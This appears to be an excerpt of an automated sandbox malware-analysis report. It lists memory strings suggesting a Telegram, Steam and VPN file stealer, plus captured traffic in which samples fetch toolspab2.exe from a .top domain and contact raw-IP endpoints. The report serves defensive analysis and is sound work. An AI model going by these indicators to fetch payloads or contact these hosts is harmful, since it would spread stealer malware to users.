                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPNResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartScannedFiles
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartScannedFilesResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartSteamFiles
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartSteamFilesResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFiles
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                    Source: 757C.exe, 00000016.00000002.659629254.00000000029C2000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeOc
                    Source: 8433.exe, 00000013.00000000.488560836.000000000085A000.00000002.00020000.sdmpString found in binary or memory: http://www.rarlab.com
                    Source: 8433.exe, 00000013.00000000.488560836.000000000085A000.00000002.00020000.sdmpString found in binary or memory: http://www.rarlab.com/themes.htm
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: 8433.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnviro
                    Source: 757C.exe, 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, 757C.exe, 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487627523.000001D408BA3000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                    Source: svchost.exe, 0000000D.00000003.465092159.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                    Source: svchost.exe, 0000000D.00000003.465092159.000001D408B8B000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.465050962.000001D408BB3000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                    Source: unknownDNS traffic detected: queries for: naghenrietti1.top
                    Source: global trafficHTTP traffic detected: GET /hcdrom1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                    Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-toolz-for-you-403.top
                    Source: global trafficHTTP traffic detected: GET /a.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.41:9080
                    Source: global trafficHTTP traffic detected: GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.41
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-21T12:54:52.3734768Z||.||0e318158-1bd5-4e26-98c4-0ca8e667cae7||1152921505693927011||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-21T12:54:52.3734768Z||.||0e318158-1bd5-4e26-98c4-0ca8e667cae7||1152921505693927011||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 